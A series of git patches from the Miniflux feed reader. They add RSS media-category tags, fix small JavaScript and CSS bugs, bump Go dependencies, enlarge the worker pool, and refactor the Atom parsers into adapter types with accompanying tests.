--- a/internal/reader/rss/adapter.go
+++ b/internal/reader/rss/adapter.go
@@ -122,6 +122,7 @@ func (r *RSSAdapter) BuildFeed(feedURL string) *model.Feed {
// Populate entry categories.
entry.Tags = append(entry.Tags, item.Categories...)
+ entry.Tags = append(entry.Tags, item.MediaCategories.Labels()...)
entry.Tags = append(entry.Tags, r.rss.Channel.Categories...)
entry.Tags = append(entry.Tags, r.rss.Channel.GetItunesCategories()...)
diff --git a/internal/reader/rss/parser_test.go b/internal/reader/rss/parser_test.go
index 41b36e8e..7e9413b0 100644
--- a/internal/reader/rss/parser_test.go
+++ b/internal/reader/rss/parser_test.go
@@ -1681,6 +1681,42 @@ func TestParseFeedWithGooglePlayCategory(t *testing.T) {
}
}
+func TestParseEntryWithMediaCategories(t *testing.T) {
+ data := `
+
+
+ Example
+ https://example.org/
+
+ Test
+ https://example.org/item
+ visual_art
+ music/artist/album/song
+ ycantpark mobile
+ Arts/Movies/Titles/A/Ace_Ventura_Series/Ace_Ventura_ -_Pet_Detective
+
+
+ `
+
+ feed, err := Parse("https://example.org/", bytes.NewReader([]byte(data)))
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if len(feed.Entries[0].Tags) != 2 {
+ t.Errorf("Incorrect number of tags, got: %d", len(feed.Entries[0].Tags))
+ }
+
+ expected := []string{"Visual Art", "Ace Ventura - Pet Detective"}
+ result := feed.Entries[0].Tags
+
+ for i, tag := range result {
+ if tag != expected[i] {
+ t.Errorf("Incorrect tag, got: %q", tag)
+ }
+ }
+}
+
func TestParseFeedWithTTLField(t *testing.T) {
data := `
From ca919c2ff8fbaf26ffc0ac72f42f7343e10ee521 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Fr=C3=A9d=C3=A9ric=20Guillot?=
Date: Wed, 13 Mar 2024 21:40:56 -0700
Subject: [PATCH 13/80] Fix JavaScript error on the login page
---
internal/ui/static/js/bootstrap.js | 6 ++++--
1 file changed, 4 insertions(+), 2 deletions(-)
diff --git a/internal/ui/static/js/bootstrap.js b/internal/ui/static/js/bootstrap.js
index e89a74dc..1b820eb5 100644
--- a/internal/ui/static/js/bootstrap.js
+++ b/internal/ui/static/js/bootstrap.js
@@ -117,8 +117,10 @@ document.addEventListener("DOMContentLoaded", () => {
fixVoiceOverDetailsSummaryBug();
const logoElement = document.querySelector(".logo");
- logoElement.addEventListener("click", toggleMainMenu);
- logoElement.addEventListener("keydown", toggleMainMenu);
+ if (logoElement) {
+ logoElement.addEventListener("click", toggleMainMenu);
+ logoElement.addEventListener("keydown", toggleMainMenu);
+ }
onClick(".header nav li", (event) => onClickMainMenuListItem(event));
From bf6d2867356bc598510480c43d18293dfffc0f49 Mon Sep 17 00:00:00 2001
From: "dependabot[bot]" <49699333+dependabot[bot]@users.noreply.github.com>
Date: Thu, 14 Mar 2024 22:43:24 +0000
Subject: [PATCH 14/80] Bump github.com/go-webauthn/webauthn from 0.10.1 to
0.10.2
Bumps [github.com/go-webauthn/webauthn](https://github.com/go-webauthn/webauthn) from 0.10.1 to 0.10.2.
- [Release notes](https://github.com/go-webauthn/webauthn/releases)
- [Commits](https://github.com/go-webauthn/webauthn/compare/v0.10.1...v0.10.2)
---
updated-dependencies:
- dependency-name: github.com/go-webauthn/webauthn
dependency-type: direct:production
update-type: version-update:semver-patch
...
Signed-off-by: dependabot[bot]
---
go.mod | 8 ++++----
go.sum | 20 ++++++++++----------
2 files changed, 14 insertions(+), 14 deletions(-)
diff --git a/go.mod b/go.mod
index 626a87d1..f47981fb 100644
--- a/go.mod
+++ b/go.mod
@@ -6,7 +6,7 @@ require (
github.com/PuerkitoBio/goquery v1.9.1
github.com/abadojack/whatlanggo v1.0.1
github.com/coreos/go-oidc/v3 v3.9.0
- github.com/go-webauthn/webauthn v0.10.1
+ github.com/go-webauthn/webauthn v0.10.2
github.com/gorilla/mux v1.8.1
github.com/lib/pq v1.10.9
github.com/prometheus/client_golang v1.19.0
@@ -20,8 +20,8 @@ require (
)
require (
- github.com/go-webauthn/x v0.1.8 // indirect
- github.com/golang-jwt/jwt/v5 v5.2.0 // indirect
+ github.com/go-webauthn/x v0.1.9 // indirect
+ github.com/golang-jwt/jwt/v5 v5.2.1 // indirect
github.com/google/go-tpm v0.9.0 // indirect
)
@@ -29,7 +29,7 @@ require (
github.com/andybalholm/cascadia v1.3.2 // indirect
github.com/beorn7/perks v1.0.1 // indirect
github.com/cespare/xxhash/v2 v2.2.0 // indirect
- github.com/fxamacker/cbor/v2 v2.5.0 // indirect
+ github.com/fxamacker/cbor/v2 v2.6.0 // indirect
github.com/go-jose/go-jose/v3 v3.0.3 // indirect
github.com/golang/protobuf v1.5.3 // indirect
github.com/google/uuid v1.6.0 // indirect
diff --git a/go.sum b/go.sum
index 7ee72412..01dd795d 100644
--- a/go.sum
+++ b/go.sum
@@ -13,16 +13,16 @@ github.com/coreos/go-oidc/v3 v3.9.0/go.mod h1:rTKz2PYwftcrtoCzV5g5kvfJoWcm0Mk8AF
github.com/davecgh/go-spew v1.1.0/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
github.com/davecgh/go-spew v1.1.1 h1:vj9j/u1bqnvCEfJOwUhtlOARqs3+rkHYY13jYWTU97c=
github.com/davecgh/go-spew v1.1.1/go.mod h1:J7Y8YcW2NihsgmVo/mv3lAwl/skON4iLHjSsI+c5H38=
-github.com/fxamacker/cbor/v2 v2.5.0 h1:oHsG0V/Q6E/wqTS2O1Cozzsy69nqCiguo5Q1a1ADivE=
-github.com/fxamacker/cbor/v2 v2.5.0/go.mod h1:TA1xS00nchWmaBnEIxPSE5oHLuJBAVvqrtAnWBwBCVo=
+github.com/fxamacker/cbor/v2 v2.6.0 h1:sU6J2usfADwWlYDAFhZBQ6TnLFBHxgesMrQfQgk1tWA=
+github.com/fxamacker/cbor/v2 v2.6.0/go.mod h1:pxXPTn3joSm21Gbwsv0w9OSA2y1HFR9qXEeXQVeNoDQ=
github.com/go-jose/go-jose/v3 v3.0.3 h1:fFKWeig/irsp7XD2zBxvnmA/XaRWp5V3CBsZXJF7G7k=
github.com/go-jose/go-jose/v3 v3.0.3/go.mod h1:5b+7YgP7ZICgJDBdfjZaIt+H/9L9T/YQrVfLAMboGkQ=
-github.com/go-webauthn/webauthn v0.10.1 h1:+RFKj4yHPy282teiiy5sqTYPfRilzBpJyedrz9KsNFE=
-github.com/go-webauthn/webauthn v0.10.1/go.mod h1:a7BwAtrSMkeuJXtIKz433Av99nAv01pdfzB0a9xkDnI=
-github.com/go-webauthn/x v0.1.8 h1:f1C6k1AyUlDvnIzWSW+G9rN9nbp1hhLXZagUtyxZ8nc=
-github.com/go-webauthn/x v0.1.8/go.mod h1:i8UNlGVt3oy6oAFcP4SZB1djZLx/4pbekCbWowjTaJg=
-github.com/golang-jwt/jwt/v5 v5.2.0 h1:d/ix8ftRUorsN+5eMIlF4T6J8CAt9rch3My2winC1Jw=
-github.com/golang-jwt/jwt/v5 v5.2.0/go.mod h1:pqrtFR0X4osieyHYxtmOUWsAWrfe1Q5UVIyoH402zdk=
+github.com/go-webauthn/webauthn v0.10.2 h1:OG7B+DyuTytrEPFmTX503K77fqs3HDK/0Iv+z8UYbq4=
+github.com/go-webauthn/webauthn v0.10.2/go.mod h1:Gd1IDsGAybuvK1NkwUTLbGmeksxuRJjVN2PE/xsPxHs=
+github.com/go-webauthn/x v0.1.9 h1:v1oeLmoaa+gPOaZqUdDentu6Rl7HkSSsmOT6gxEQHhE=
+github.com/go-webauthn/x v0.1.9/go.mod h1:pJNMlIMP1SU7cN8HNlKJpLEnFHCygLCvaLZ8a1xeoQA=
+github.com/golang-jwt/jwt/v5 v5.2.1 h1:OuVbFODueb089Lh128TAcimifWaLhJwVflnrgM17wHk=
+github.com/golang-jwt/jwt/v5 v5.2.1/go.mod h1:pqrtFR0X4osieyHYxtmOUWsAWrfe1Q5UVIyoH402zdk=
github.com/golang/protobuf v1.5.0/go.mod h1:FsONVRAS9T7sI+LIUmWTfcYkHO4aIWwzhcaSAoJOfIk=
github.com/golang/protobuf v1.5.2/go.mod h1:XVQd3VNwM+JqD3oG2Ue2ip4fOMUkwXdXDdiuN0vRsmY=
github.com/golang/protobuf v1.5.3 h1:KhyjKVUg7Usr/dYsdSqoFveMYd5ko72D+zANwlG1mmg=
@@ -53,8 +53,8 @@ github.com/prometheus/procfs v0.12.0 h1:jluTpSng7V9hY0O2R9DzzJHYb2xULk9VTR1V1R/k
github.com/prometheus/procfs v0.12.0/go.mod h1:pcuDEFsWDnvcgNzo4EEweacyhjeA9Zk3cnaOZAZEfOo=
github.com/stretchr/objx v0.1.0/go.mod h1:HFkY916IF+rwdDfMAkV7OtwuqBVzrE8GR6GFx+wExME=
github.com/stretchr/testify v1.7.0/go.mod h1:6Fq8oRcR53rry900zMqJjRRixrwX3KX962/h/Wwjteg=
-github.com/stretchr/testify v1.8.4 h1:CcVxjf3Q8PM0mHUKJCdn+eZZtm5yQwehR5yeSVQQcUk=
-github.com/stretchr/testify v1.8.4/go.mod h1:sz/lmYIOXD/1dqDmKjjqLyZ2RngseejIcXlSw2iwfAo=
+github.com/stretchr/testify v1.9.0 h1:HtqpIVDClZ4nwg75+f6Lvsy/wHu+3BoSGCbBAcpTsTg=
+github.com/stretchr/testify v1.9.0/go.mod h1:r2ic/lqez/lEtzL7wO/rwa5dbSLXVDPFyf8C91i36aY=
github.com/tdewolff/minify/v2 v2.20.19 h1:tX0SR0LUrIqGoLjXnkIzRSIbKJ7PaNnSENLD4CyH6Xo=
github.com/tdewolff/minify/v2 v2.20.19/go.mod h1:ulkFoeAVWMLEyjuDz1ZIWOA31g5aWOawCFRp9R/MudM=
github.com/tdewolff/parse/v2 v2.7.12 h1:tgavkHc2ZDEQVKy1oWxwIyh5bP4F5fEh/JmBwPP/3LQ=
From 7310e134996a41a1e2a2dc1dbe9f60c75cdde8cf Mon Sep 17 00:00:00 2001
From: jvoisin
Date: Thu, 14 Mar 2024 12:56:48 +0100
Subject: [PATCH 15/80] More trusted-types compatibility
---
internal/ui/static/js/app.js | 10 +++++-----
1 file changed, 5 insertions(+), 5 deletions(-)
diff --git a/internal/ui/static/js/app.js b/internal/ui/static/js/app.js
index 2ce1a1e8..89f61c79 100644
--- a/internal/ui/static/js/app.js
+++ b/internal/ui/static/js/app.js
@@ -201,7 +201,7 @@ function toggleEntryStatus(element, toasting) {
}
}
- link.innerHTML = iconElement.innerHTML;
+ link.replaceChildren(iconElement.content.cloneNode(true));
addIcon(link, label);
link.dataset.value = newStatus;
@@ -322,7 +322,7 @@ function toggleBookmark(parentElement, toasting) {
}
}
- element.innerHTML = iconElement.innerHTML;
+ element.replaceChildren(iconElement.content.cloneNode(true));
addIcon(element, label);
element.dataset.value = newStarStatus;
});
@@ -353,7 +353,7 @@ function handleFetchOriginalContent() {
document.querySelector(".entry-content").innerHTML = data.content;
const entryReadingtimeElement = document.querySelector(".entry-reading-time");
if (entryReadingtimeElement) {
- entryReadingtimeElement.innerHTML = data.reading_time;
+ entryReadingtimeElement.textContent = data.reading_time;
}
}
});
@@ -533,7 +533,7 @@ function incrementUnreadCounter(n) {
function updateUnreadCounterValue(callback) {
document.querySelectorAll("span.unread-counter").forEach((element) => {
const oldValue = parseInt(element.textContent, 10);
- element.innerHTML = callback(oldValue);
+ element.textContent = callback(oldValue);
});
if (window.location.href.endsWith('/unread')) {
@@ -628,7 +628,7 @@ function showToast(label, iconElement) {
const toastMsgElement = document.getElementById("toast-msg");
if (toastMsgElement) {
- toastMsgElement.innerHTML = iconElement.innerHTML;
+ toastMsgElement.replaceChildren(iconElement.content.cloneNode(true));
addIcon(toastMsgElement, label);
const toastElementWrapper = document.getElementById("toast-wrapper");
From 7a307f8e74b98f8c76dab8647f89d006b8dfa703 Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Fr=C3=A9d=C3=A9ric=20Guillot?=
Date: Thu, 14 Mar 2024 17:19:16 -0700
Subject: [PATCH 16/80] Fix regression: Add to Home Screen button is unreadable
Regression introduced in commit https://github.com/miniflux/v2/commit/ea58bac5489cd71f898312132f6e8d7b42cb4d33
---
internal/ui/static/css/common.css | 2 ++
1 file changed, 2 insertions(+)
diff --git a/internal/ui/static/css/common.css b/internal/ui/static/css/common.css
index aa107d12..1a3c3ee8 100644
--- a/internal/ui/static/css/common.css
+++ b/internal/ui/static/css/common.css
@@ -242,6 +242,8 @@ a:hover {
text-decoration: none;
line-height: 30px;
color: #fff;
+ background-color: transparent;
+ border: 0;
}
#btn-add-to-home-screen:hover {
From 2ba893bc79eb7e8cdcf5dfe4929f818247fcd82d Mon Sep 17 00:00:00 2001
From: jvoisin
Date: Thu, 14 Mar 2024 22:59:38 +0100
Subject: [PATCH 17/80] Bump the number of simultaneous workers
We're in 2024; I'm pretty sure we can afford to have 16 HTTP connections
open at the same time, instead of only 5.
---
internal/config/options.go | 2 +-
miniflux.1 | 2 +-
2 files changed, 2 insertions(+), 2 deletions(-)
diff --git a/internal/config/options.go b/internal/config/options.go
index 483192f9..2169504f 100644
--- a/internal/config/options.go
+++ b/internal/config/options.go
@@ -27,7 +27,7 @@ const (
defaultBaseURL = "http://localhost"
defaultRootURL = "http://localhost"
defaultBasePath = ""
- defaultWorkerPoolSize = 5
+ defaultWorkerPoolSize = 16
defaultPollingFrequency = 60
defaultForceRefreshInterval = 30
defaultBatchSize = 100
diff --git a/miniflux.1 b/miniflux.1
index 81e8d721..a07c678e 100644
--- a/miniflux.1
+++ b/miniflux.1
@@ -165,7 +165,7 @@ Default is "info"\&.
.B WORKER_POOL_SIZE
Number of background workers\&.
.br
-Default is 5 workers\&.
+Default is 16 workers\&.
.TP
.B POLLING_FREQUENCY
Refresh interval in minutes for feeds\&.
From dd4fb660c19fd1f6ce5716f9f5783eb7565fed2d Mon Sep 17 00:00:00 2001
From: =?UTF-8?q?Fr=C3=A9d=C3=A9ric=20Guillot?=
Date: Fri, 15 Mar 2024 16:39:32 -0700
Subject: [PATCH 18/80] Refactor Atom parser to use an adapter
---
internal/reader/atom/atom_03.go | 216 +++++--------
internal/reader/atom/atom_03_adapter.go | 115 +++++++
internal/reader/atom/atom_03_test.go | 26 +-
internal/reader/atom/atom_10.go | 407 ++++++++++--------------
internal/reader/atom/atom_10_adapter.go | 210 ++++++++++++
internal/reader/atom/atom_10_test.go | 145 ++++-----
internal/reader/atom/atom_common.go | 111 +++++--
internal/reader/atom/parser.go | 28 +-
internal/reader/json/adapter.go | 4 +-
internal/reader/parser/parser_test.go | 30 +-
internal/reader/rss/adapter.go | 3 +-
11 files changed, 795 insertions(+), 500 deletions(-)
create mode 100644 internal/reader/atom/atom_03_adapter.go
create mode 100644 internal/reader/atom/atom_10_adapter.go
diff --git a/internal/reader/atom/atom_03.go b/internal/reader/atom/atom_03.go
index edcb83dc..fb458e91 100644
--- a/internal/reader/atom/atom_03.go
+++ b/internal/reader/atom/atom_03.go
@@ -6,158 +6,114 @@ package atom // import "miniflux.app/v2/internal/reader/atom"
import (
"encoding/base64"
"html"
- "log/slog"
"strings"
- "time"
-
- "miniflux.app/v2/internal/crypto"
- "miniflux.app/v2/internal/model"
- "miniflux.app/v2/internal/reader/date"
- "miniflux.app/v2/internal/reader/sanitizer"
- "miniflux.app/v2/internal/urllib"
)
// Specs: http://web.archive.org/web/20060811235523/http://www.mnot.net/drafts/draft-nottingham-atom-format-02.html
-type atom03Feed struct {
- ID string `xml:"id"`
- Title atom03Text `xml:"title"`
- Author atomPerson `xml:"author"`
- Links atomLinks `xml:"link"`
- Entries []atom03Entry `xml:"entry"`
+type Atom03Feed struct {
+ Version string `xml:"version,attr"`
+
+ // The "atom:id" element's content conveys a permanent, globally unique identifier for the feed.
+ // It MUST NOT change over time, even if the feed is relocated. atom:feed elements MAY contain an atom:id element,
+ // but MUST NOT contain more than one. The content of this element, when present, MUST be a URI.
+ ID string `xml:"http://purl.org/atom/ns# id"`
+
+ // The "atom:title" element is a Content construct that conveys a human-readable title for the feed.
+ // atom:feed elements MUST contain exactly one atom:title element.
+ // If the feed describes a Web resource, its content SHOULD be the same as that resource's title.
+ Title Atom03Content `xml:"http://purl.org/atom/ns# title"`
+
+ // The "atom:link" element is a Link construct that conveys a URI associated with the feed.
+ // The nature of the relationship as well as the link itself is determined by the element's content.
+ // atom:feed elements MUST contain at least one atom:link element with a rel attribute value of "alternate".
+ // atom:feed elements MUST NOT contain more than one atom:link element with a rel attribute value of "alternate" that has the same type attribute value.
+ // atom:feed elements MAY contain additional atom:link elements beyond those described above.
+ Links AtomLinks `xml:"http://purl.org/atom/ns# link"`
+
+ // The "atom:author" element is a Person construct that indicates the default author of the feed.
+ // atom:feed elements MUST contain exactly one atom:author element,
+ // UNLESS all of the atom:feed element's child atom:entry elements contain an atom:author element.
+ // atom:feed elements MUST NOT contain more than one atom:author element.
+ Author AtomPerson `xml:"http://purl.org/atom/ns# author"`
+
+ // The "atom:entry" element represents an individual entry that is contained by the feed.
+ // atom:feed elements MAY contain one or more atom:entry elements.
+ Entries []Atom03Entry `xml:"http://purl.org/atom/ns# entry"`
}
-func (a *atom03Feed) Transform(baseURL string) *model.Feed {
- var err error
+type Atom03Entry struct {
+ // The "atom:id" element's content conveys a permanent, globally unique identifier for the entry.
+ // It MUST NOT change over time, even if other representations of the entry (such as a web representation pointed to by the entry's atom:link element) are relocated.
+ // If the same entry is syndicated in two atom:feeds published by the same entity, the entry's atom:id MUST be the same in both feeds.
+ ID string `xml:"id"`
- feed := new(model.Feed)
+ // The "atom:title" element is a Content construct that conveys a human-readable title for the entry.
+ // atom:entry elements MUST have exactly one "atom:title" element.
+ // If an entry describes a Web resource, its content SHOULD be the same as that resource's title.
+ Title Atom03Content `xml:"title"`
- feedURL := a.Links.firstLinkWithRelation("self")
- feed.FeedURL, err = urllib.AbsoluteURL(baseURL, feedURL)
- if err != nil {
- feed.FeedURL = feedURL
- }
+ // The "atom:modified" element is a Date construct that indicates the time that the entry was last modified.
+ // atom:entry elements MUST contain an atom:modified element, but MUST NOT contain more than one.
+ // The content of an atom:modified element MUST have a time zone whose value SHOULD be "UTC".
+ Modified string `xml:"modified"`
- siteURL := a.Links.originalLink()
- feed.SiteURL, err = urllib.AbsoluteURL(baseURL, siteURL)
- if err != nil {
- feed.SiteURL = siteURL
- }
+ // The "atom:issued" element is a Date construct that indicates the time that the entry was issued.
+ // atom:entry elements MUST contain an atom:issued element, but MUST NOT contain more than one.
+ // The content of an atom:issued element MAY omit a time zone.
+ Issued string `xml:"issued"`
- feed.Title = a.Title.String()
- if feed.Title == "" {
- feed.Title = feed.SiteURL
- }
+ // The "atom:created" element is a Date construct that indicates the time that the entry was created.
+ // atom:entry elements MAY contain an atom:created element, but MUST NOT contain more than one.
+ // The content of an atom:created element MUST have a time zone whose value SHOULD be "UTC".
+ // If atom:created is not present, its content MUST be considered to be the same as that of atom:modified.
+ Created string `xml:"created"`
- for _, entry := range a.Entries {
- item := entry.Transform()
- entryURL, err := urllib.AbsoluteURL(feed.SiteURL, item.URL)
- if err == nil {
- item.URL = entryURL
- }
+ // The "atom:link" element is a Link construct that conveys a URI associated with the entry.
+ // The nature of the relationship as well as the link itself is determined by the element's content.
+ // atom:entry elements MUST contain at least one atom:link element with a rel attribute value of "alternate".
+ // atom:entry elements MUST NOT contain more than one atom:link element with a rel attribute value of "alternate" that has the same type attribute value.
+ // atom:entry elements MAY contain additional atom:link elements beyond those described above.
+ Links AtomLinks `xml:"link"`
- if item.Author == "" {
- item.Author = a.Author.String()
- }
+ // The "atom:summary" element is a Content construct that conveys a short summary, abstract or excerpt of the entry.
+ // atom:entry elements MAY contain an atom:summary element, but MUST NOT contain more than one.
+ Summary Atom03Content `xml:"summary"`
- if item.Title == "" {
- item.Title = sanitizer.TruncateHTML(item.Content, 100)
- }
+ // The "atom:content" element is a Content construct that conveys the content of the entry.
+ // atom:entry elements MAY contain one or more atom:content elements.
+ Content Atom03Content `xml:"content"`
- if item.Title == "" {
- item.Title = item.URL
- }
-
- feed.Entries = append(feed.Entries, item)
- }
-
- return feed
+ // The "atom:author" element is a Person construct that indicates the default author of the entry.
+ // atom:entry elements MUST contain exactly one atom:author element,
+ // UNLESS the atom:feed element containing them contains an atom:author element itself.
+ // atom:entry elements MUST NOT contain more than one atom:author element.
+ Author AtomPerson `xml:"author"`
}
-type atom03Entry struct {
- ID string `xml:"id"`
- Title atom03Text `xml:"title"`
- Modified string `xml:"modified"`
- Issued string `xml:"issued"`
- Created string `xml:"created"`
- Links atomLinks `xml:"link"`
- Summary atom03Text `xml:"summary"`
- Content atom03Text `xml:"content"`
- Author atomPerson `xml:"author"`
-}
+type Atom03Content struct {
+ // Content constructs MAY have a "type" attribute, whose value indicates the media type of the content.
+ // When present, this attribute's value MUST be a registered media type [RFC2045].
+ // If not present, its value MUST be considered to be "text/plain".
+ Type string `xml:"type,attr"`
-func (a *atom03Entry) Transform() *model.Entry {
- entry := model.NewEntry()
- entry.URL = a.Links.originalLink()
- entry.Date = a.entryDate()
- entry.Author = a.Author.String()
- entry.Hash = a.entryHash()
- entry.Content = a.entryContent()
- entry.Title = a.entryTitle()
- return entry
-}
+ // Content constructs MAY have a "mode" attribute, whose value indicates the method used to encode the content.
+ // When present, this attribute's value MUST be listed below.
+ // If not present, its value MUST be considered to be "xml".
+ //
+ // "xml": A mode attribute with the value "xml" indicates that the element's content is inline xml (for example, namespace-qualified XHTML).
+ //
+ // "escaped": A mode attribute with the value "escaped" indicates that the element's content is an escaped string.
+ // Processors MUST unescape the element's content before considering it as content of the indicated media type.
+ //
+ // "base64": A mode attribute with the value "base64" indicates that the element's content is base64-encoded [RFC2045].
+ // Processors MUST decode the element's content before considering it as content of the indicated media type.
+ Mode string `xml:"mode,attr"`
-func (a *atom03Entry) entryTitle() string {
- return sanitizer.StripTags(a.Title.String())
-}
-
-func (a *atom03Entry) entryContent() string {
- content := a.Content.String()
- if content != "" {
- return content
- }
-
- summary := a.Summary.String()
- if summary != "" {
- return summary
- }
-
- return ""
-}
-
-func (a *atom03Entry) entryDate() time.Time {
- dateText := ""
- for _, value := range []string{a.Issued, a.Modified, a.Created} {
- if value != "" {
- dateText = value
- break
- }
- }
-
- if dateText != "" {
- result, err := date.Parse(dateText)
- if err != nil {
- slog.Debug("Unable to parse date from Atom 0.3 feed",
- slog.String("date", dateText),
- slog.String("id", a.ID),
- slog.Any("error", err),
- )
- return time.Now()
- }
-
- return result
- }
-
- return time.Now()
-}
-
-func (a *atom03Entry) entryHash() string {
- for _, value := range []string{a.ID, a.Links.originalLink()} {
- if value != "" {
- return crypto.Hash(value)
- }
- }
-
- return ""
-}
-
-type atom03Text struct {
- Type string `xml:"type,attr"`
- Mode string `xml:"mode,attr"`
CharData string `xml:",chardata"`
InnerXML string `xml:",innerxml"`
}
-func (a *atom03Text) String() string {
+func (a *Atom03Content) Content() string {
content := ""
switch {
diff --git a/internal/reader/atom/atom_03_adapter.go b/internal/reader/atom/atom_03_adapter.go
new file mode 100644
index 00000000..02d78ec8
--- /dev/null
+++ b/internal/reader/atom/atom_03_adapter.go
@@ -0,0 +1,128 @@
+// SPDX-FileCopyrightText: Copyright The Miniflux Authors. All rights reserved.
+// SPDX-License-Identifier: Apache-2.0
+
+package atom // import "miniflux.app/v2/internal/reader/atom"
+
+import (
+	"log/slog"
+	"time"
+
+	"miniflux.app/v2/internal/crypto"
+	"miniflux.app/v2/internal/model"
+	"miniflux.app/v2/internal/reader/date"
+	"miniflux.app/v2/internal/reader/sanitizer"
+	"miniflux.app/v2/internal/urllib"
+)
+
+// Atom03Adapter wraps a parsed Atom 0.3 document and builds a model.Feed from it.
+type Atom03Adapter struct {
+	atomFeed *Atom03Feed
+}
+
+// NewAtom03Adapter returns an adapter that wraps the given parsed Atom 0.3 feed.
+func NewAtom03Adapter(atomFeed *Atom03Feed) *Atom03Adapter {
+	return &Atom03Adapter{atomFeed}
+}
+
+// BuildFeed converts the wrapped Atom 0.3 document into a model.Feed.
+//
+// baseURL is handed to urllib.AbsoluteURL to make the feed and site links
+// absolute, and is used as the feed URL or site URL when the document has no
+// corresponding link. Entry links are made absolute against the site URL.
+func (a *Atom03Adapter) BuildFeed(baseURL string) *model.Feed {
+	feed := new(model.Feed)
+
+	// Populate the feed URL.
+	feedURL := a.atomFeed.Links.firstLinkWithRelation("self")
+	if feedURL != "" {
+		if absoluteFeedURL, err := urllib.AbsoluteURL(baseURL, feedURL); err == nil {
+			feed.FeedURL = absoluteFeedURL
+		}
+	} else {
+		feed.FeedURL = baseURL
+	}
+
+	// Populate the site URL.
+	siteURL := a.atomFeed.Links.OriginalLink()
+	if siteURL != "" {
+		if absoluteSiteURL, err := urllib.AbsoluteURL(baseURL, siteURL); err == nil {
+			feed.SiteURL = absoluteSiteURL
+		}
+	} else {
+		feed.SiteURL = baseURL
+	}
+
+	// Populate the feed title.
+	feed.Title = a.atomFeed.Title.Content()
+	if feed.Title == "" {
+		feed.Title = feed.SiteURL
+	}
+
+	for _, atomEntry := range a.atomFeed.Entries {
+		entry := model.NewEntry()
+
+		// Populate the entry URL.
+		entry.URL = atomEntry.Links.OriginalLink()
+		if entry.URL != "" {
+			if absoluteEntryURL, err := urllib.AbsoluteURL(feed.SiteURL, entry.URL); err == nil {
+				entry.URL = absoluteEntryURL
+			}
+		}
+
+		// Populate the entry content.
+		entry.Content = atomEntry.Content.Content()
+		if entry.Content == "" {
+			entry.Content = atomEntry.Summary.Content()
+		}
+
+		// Populate the entry title.
+		entry.Title = atomEntry.Title.Content()
+		if entry.Title == "" {
+			entry.Title = sanitizer.TruncateHTML(entry.Content, 100)
+		}
+		if entry.Title == "" {
+			entry.Title = entry.URL
+		}
+
+		// Populate the entry author.
+		entry.Author = atomEntry.Author.PersonName()
+		if entry.Author == "" {
+			entry.Author = a.atomFeed.Author.PersonName()
+		}
+
+		// Populate the entry date from the first date element that parses.
+		// Absent elements are skipped so they do not produce misleading debug logs.
+		for _, value := range []string{atomEntry.Issued, atomEntry.Modified, atomEntry.Created} {
+			if value == "" {
+				continue
+			}
+
+			parsedDate, err := date.Parse(value)
+			if err == nil {
+				entry.Date = parsedDate
+				break
+			}
+
+			slog.Debug("Unable to parse date from Atom 0.3 feed",
+				slog.String("date", value),
+				slog.String("id", atomEntry.ID),
+				slog.Any("error", err),
+			)
+		}
+		if entry.Date.IsZero() {
+			entry.Date = time.Now()
+		}
+
+		// Generate the entry hash.
+		for _, value := range []string{atomEntry.ID, atomEntry.Links.OriginalLink()} {
+			if value != "" {
+				entry.Hash = crypto.Hash(value)
+				break
+			}
+		}
+
+		feed.Entries = append(feed.Entries, entry)
+	}
+
+	return feed
+}
diff --git a/internal/reader/atom/atom_03_test.go b/internal/reader/atom/atom_03_test.go
index 321c0d82..54662bc9 100644
--- a/internal/reader/atom/atom_03_test.go
+++ b/internal/reader/atom/atom_03_test.go
@@ -27,7 +27,7 @@ func TestParseAtom03(t *testing.T) {
`
- feed, err := Parse("http://diveintomark.org/", bytes.NewReader([]byte(data)), "0.3")
+ feed, err := Parse("http://diveintomark.org/atom.xml", bytes.NewReader([]byte(data)), "0.3")
if err != nil {
t.Fatal(err)
}
@@ -36,7 +36,7 @@ func TestParseAtom03(t *testing.T) {
t.Errorf("Incorrect title, got: %s", feed.Title)
}
- if feed.FeedURL != "http://diveintomark.org/" {
+ if feed.FeedURL != "http://diveintomark.org/atom.xml" {
t.Errorf("Incorrect feed URL, got: %s", feed.FeedURL)
}
@@ -74,6 +74,28 @@ func TestParseAtom03(t *testing.T) {
}
}
+func TestParseAtom03WithoutSiteURL(t *testing.T) {
+ data := `
+
+ 2003-12-13T18:30:02Z
+ Mark Pilgrim
+
+ Atom 0.3 snapshot
+
+ tag:diveintomark.org,2003:3.2397
+
+ `
+
+ feed, err := Parse("http://diveintomark.org/atom.xml", bytes.NewReader([]byte(data)), "0.3")
+ if err != nil {
+ t.Fatal(err)
+ }
+
+ if feed.SiteURL != "http://diveintomark.org/atom.xml" {
+ t.Errorf("Incorrect site URL, got: %s", feed.SiteURL)
+ }
+}
+
func TestParseAtom03WithoutFeedTitle(t *testing.T) {
data := `
diff --git a/internal/reader/atom/atom_10.go b/internal/reader/atom/atom_10.go
index 798a8748..201d00d1 100644
--- a/internal/reader/atom/atom_10.go
+++ b/internal/reader/atom/atom_10.go
@@ -6,286 +6,199 @@ package atom // import "miniflux.app/v2/internal/reader/atom"
import (
"encoding/xml"
"html"
- "log/slog"
- "strconv"
"strings"
- "time"
- "miniflux.app/v2/internal/crypto"
- "miniflux.app/v2/internal/model"
- "miniflux.app/v2/internal/reader/date"
"miniflux.app/v2/internal/reader/media"
"miniflux.app/v2/internal/reader/sanitizer"
- "miniflux.app/v2/internal/urllib"
)
+// The "atom:feed" element is the document (i.e., top-level) element of
+// an Atom Feed Document, acting as a container for metadata and data
+// associated with the feed. Its element children consist of metadata
+// elements followed by zero or more atom:entry child elements.
+//
// Specs:
// https://tools.ietf.org/html/rfc4287
// https://validator.w3.org/feed/docs/atom.html
-type atom10Feed struct {
- XMLName xml.Name `xml:"http://www.w3.org/2005/Atom feed"`
- ID string `xml:"id"`
- Title atom10Text `xml:"title"`
- Authors atomAuthors `xml:"author"`
- Icon string `xml:"icon"`
- Links atomLinks `xml:"link"`
- Entries []atom10Entry `xml:"entry"`
+type Atom10Feed struct {
+ XMLName xml.Name `xml:"http://www.w3.org/2005/Atom feed"`
+
+ // The "atom:id" element conveys a permanent, universally unique
+ // identifier for an entry or feed.
+ //
+ // Its content MUST be an IRI, as defined by [RFC3987]. Note that the
+ // definition of "IRI" excludes relative references. Though the IRI
+ // might use a dereferencable scheme, Atom Processors MUST NOT assume it
+ // can be dereferenced.
+ //
